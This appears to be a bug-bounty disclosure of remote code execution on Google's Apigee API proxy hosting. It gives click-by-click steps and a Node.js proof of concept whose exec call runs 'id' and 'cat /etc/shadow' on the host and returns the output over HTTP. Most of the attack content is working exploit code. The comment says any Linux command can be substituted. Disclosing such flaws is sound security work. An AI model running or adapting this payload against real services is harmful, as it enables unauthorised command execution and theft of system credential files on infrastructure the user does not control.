Apigee API proxies code exec

Summary: RCE on Apigee API proxies

Steps to reproduce:

1.- open apigee.com login in with your account

2.- navigate to Develop > API proxies and click “+Proxy” button

3.- select hosted target: – put any name (in this case “rce”) – select “Quick start” radio button and the “Next” button – then “Next” again, and “Next” one more time – – check “prod” checkbox and clic “Create and Deploy” Button – after the deploy, copy the url and clic on “Edit proxy”

4.- select “Develop” tab, then clic the “index.js” file in “Resources > hosted” section, and replace the content of that file with and clic on “Save” and “Save” one more time:

var http = require('http');
const { exec } = require('child_process');
var svr = http.createServer(function(req, resp) {
  resp.setHeader('Content-Type', 'application/json');
    // you can put any linux command in exec function 
    exec('echo "- - - - id - - - -";id; echo ;echo "- cat /etc/shadow - ";cat /etc/shadow' , 
    	(error, stdout, stderr) => {
        	resp.end(stdout + '\npoc by @omespino');
    	}
    );
});
svr.listen(process.env.PORT || 3000, function() {});